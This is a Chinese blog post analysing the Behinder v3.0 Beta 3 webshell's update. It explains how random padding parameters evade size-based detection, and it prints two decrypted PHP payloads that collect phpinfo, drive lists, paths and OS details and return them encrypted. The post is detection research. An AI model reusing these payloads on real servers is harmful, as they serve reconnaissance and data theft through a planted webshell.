冰蝎 Behinder_v3.0 Beta 3 重点更新简析

发表于 2020-08-21 |

17日刚分析出特征：冰蝎v3.0 Beta 2(Behinder_v3.0 Beta 2)Webshell分析与检测

19号就迅速更新了，下面是更新日志：

###2020.8.18 v3.0 Beta 3 更新日志

1.增加了端口映射功能的稳定性；
2.Java服务端支持Java6+；
3.修复了PHP版本连接不上的问题，PHP版本支持为PHP5.3~PHP7.4；
4.修复了aspx连接不上的问题；
5.修复了asp版本无法连接的问题；
6.请求体增加了随机冗余参数，避免防护设备通过请求体大小识别请求；
7.更新了内置的UesrAgent列表；
8.修复了请求体中cookie值携带cookie属性的问题；
9.修该了Accept请求头；
10.修复了某些环境下无法列目录的问题；
11.修复了文件无法打开的问题。

重点是第6个，请求体增加了随机冗余参数，避免防护设备通过请求体大小识别请求；

之前可以通过长度来检测，现在就不行了

我们看看是怎么实现的，通过在shell.php解密，得到

第一次本来的加密UUID，现在变成随机的了

@error_reporting(0);
function main($content)
{
        $result = array();
        $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];
    echo encrypt(json_encode($result),$key);
}

function encrypt($data,$key)
{
        if(!extension_loaded('openssl'))
            {
                    for($i=0;$i<strlen($data);$i++) {
                             $data[$i] = $data[$i]^$key[$i+1&15]; 
                            }
                        return $data;
            }
    else
            {
                    return openssl_encrypt($data, "AES128", $key);
            }
}$content="SIkvTMWr2o8qPz0tIm8tAiNeoq09J7ubMxoqB3iDfFZ7Xv8SijXOhjUY5EAErzm49U72FFaMswp5y2k9jkZpENXlM04ib42SdGgaz9gF0N94NInseTYfzK9YvSGtPzPrJh8wbCyeuTGCnABOIWu0Mn3ejj3VV1DzRpt6PZV8rW6NeXub838QJ9kHOxhLd3FCUvzTndoRAKp68YNvXzPyrfukhnypV7gW615bGGBO5MDiOClSZMnI56x6SNWpdeK3IkneMzf2UGpATREmsXgzHycFEOEsxBXjRs4NG7L2E9g4HSZhPFxHmU0OWZDIbuUuMpgMQwBfhYcWImbNoLikMHcmXMrBvJ62RzdHdW3lbRn4KwgYVwIEdqoX8freud3TSrmwPyKqv4STYpmHRGaFMMYWIsHB6svdbh86iSn7rWx8KmKgsGOUdapsQBxYMNDJcwH1wBgj2nUGQI9jDwO1Nmfl9va2MTaFI2L7zkePJXc73zTnV0AVUJRoA6aJNQlFoNrhxfb6HiAtRSKLNDxQUw6A10Cp1nU2dyLdGb9iKIoetujXlLDcbwErTijw8UX9kbH5EhUBSpkp5H9q7zA2T4emIqxnaxCaqUsiPYSeM11AjyxVs2UuQmk6BZaDq0HCHLtmH95bJbzD7PPb92zOT1lkG2U1JDoOsyOFw174g35NFyHh9hlgAUEuu3cxUVwJgPRaafWpIvyQHvK3186Joqb67seS8sbEwaRrH568hwqg32TrdXBh1SqYMQgpJlQROIuqGIAFFVRPrOBWbG36tkmTHzIybXGmLVgh1f4SHwrcl7mHiVrH7HWJtrYv8lz0fzcnjeR4uIvrAUkTxUCon2KgTs6clCdUxX55iSashffiCo9T9nV5Io3ziAv9zk5JGu5SdvfNUy7KsCUpQsSb5CV7dRfVOMewJcWawZyA8h7zIdcz7AaYuLY7rnoRX1WxbSznDh6pAhrmRnm0bpH8sE2STF9paiInqcgNKOIElTXdL77WPF9u6FjkdLLxtGpjn62L1qczjN28DiT7XXvgqaNmJPoX8p5PSxXysE1S7LiXWxMDdIWioL0Q2HMbkCieCjlBxFi5Tsp6Oro7YQOGz9MXqrDIx6jQEf5laQD4IOgGBQYgJS1NcgPcHacG6apKjwQFFSe0zy1CLvrPHoudDHUbA0k3Jd2D1raC4cEt9j80KvaqNaZu2d3G1TvWYtNTh5JNdl89p0WGCB22UFOzJ1jxJZRuRlpGEwktlriBFuKynEDYx7mQtKpWnDP8n0uMLbdIqLJGoBxG1rPiCWawAlhqWRNiUFALuiTybcCPSQqZuyYvNQOXbI8qRGzpZVspfNukqOnggXrl7yT81hwEScAp9Tyay35nZmmKwPmQJkaL70z5kpw2MIptuvZDPYLRTGwhXOG2UlNHE6fj5AV25U3NmLWgxyTFs3inTZWqhqUFHax9ihKyH14iNN9zIsZm7YnIcz0f5eMECtTAOEbmwpgjrUxa35bTKiKzg3XC5nd3BdSQ1fU967wsnuZaKv5Ydux75HOMUpfzHz7ouFW7t7DhStDRKf129XSPxWB1c637W4PrOkusvfKo9rZ6vKXkxTLMEZgnheOcB301uX0pIgFx2p8LttrXE9J14fGnAMYdSio9rhCkckUvw3AMOX7FMxP7H7utYc3RRW43GIGpjwxpnL3qOBNcc9fmnwwllmoPErt0oUBah4T1Kbadx2Igk4ZuMDwVjEXHDBpJckKKAsR6lhMZpoiIxiJQkKzArCkDmiC5N0RPBhgIZmpyQyqIpSgdm4WDYLIzdDT92QmDoRFSVfhqQrTjVhjVkoFbJZ8vLUP5aq4lgJlb2osww0p1K38Lfots3YEJ4nA5psgvrPJi3uzzFo8RtCVgZfd75qGpnnN4Smz9cIKYHOHpFNno9pBnfR3pjhv82rDuREuKlf4JPQIyFoP4xi90RM28WxHUIZ4fpLUG1oWNo3O2v8aGQXjB7D4dVdRLNBc56dVRfCR7jFEJeCdhdWNWrTLJNXlg2ZYtjmQOb89AFzFaMtjSnt0wNmDR4J1jAQF6FJtFr3eXdAHtsf6PuUglFqCDo5cO3Z5xXBuWhazpsl42KPYVHglLJjAFezN06GhC8ifXzAJCbMWmQMGfeRANbwYjGOcl27WYTTzbKkLjes6hkNnJetCdBefmoEPXPWECpo5cvsRL675MK75cJsj7tLBKyR7ZdeD4lihIEjhmuhnXouPvIkfIldGJy3almm6ToZmMk8GfLUwyOxG6fkV4EQ6wf46bmikYPcWyO1B7tsVUCJMiIG1X7Vj6LKQaiQzJNeZ4wb60JAAWUr9q0ovCUfhhqYD0tfilhtipjkdgpsLjfMAGT4SJ20noT8X9XNoZcLF9xyVquOcSXwmhnij61sc2pUuD7PJV6HRYVzbqpkzCbUJY9GOD";
main($content);

第二次是调用获取基本信息，代码本来是固定的，但是加了一个随机参数，当然这个参数不会在函数中用的

error_reporting(0);
function main($whatever) {
    ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
    $driveList ="";
    if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
    {
        for($i=65;$i<=90;$i++)
    	{
    		$drive=chr($i).':/';
    		file_exists($drive) ? $driveList=$driveList.$drive.";":'';
    	}
    }
	else
	{
		$driveList="/";
	}
    $currentPath=getcwd();
    //echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList;
    $osInfo=PHP_OS;
    $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));
    //echo json_encode($result);
    session_start();
    $key=$_SESSION['k'];
    //echo json_encode($result);
    //echo openssl_encrypt(json_encode($result), "AES128", $key);
    echo encrypt(json_encode($result), $key);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}$whatever="7MgESJ8WA7onT3DlRntO54FQCVviYt5ed7j16Op1Tlda5mtXGgngNkfLWmf8JGkK5zNzMVABGM2tWlKglVg8aOlVkKxESfnEbN7M9u7mKK9hxIiJ0hoyOe1muWuCKdsGF4AnEqu2fC1rtXszlhW4uJeuQMulzXGOWNdxOJmzVv71VI4ZoWezGr2ci6gKAIEWBYcMKth8GqhE47mrQjHI59JoK53P6ckDwWHBDbRo6gXPHnxbGbyO3hwMWbr9MEEZ6OCntxJQClMgn8Sl";
main($whatever);

那么这样就导致我们之前的强特征直接消失了

暂时还没找到非常精准的特征去检测，攻防对抗真激烈啊

常规的字符串匹配，正则，应该很难检测了

我没怎么接触机器学习，不知道能否应用到这里，感觉应该是可以的，机器学习可以解决分类问题

毕竟这是一个全程base64加密，解密后都是不可见字符，返回包也是。

假如你看不到评论，可能是你访问Disqus被墙了，请使用代理访问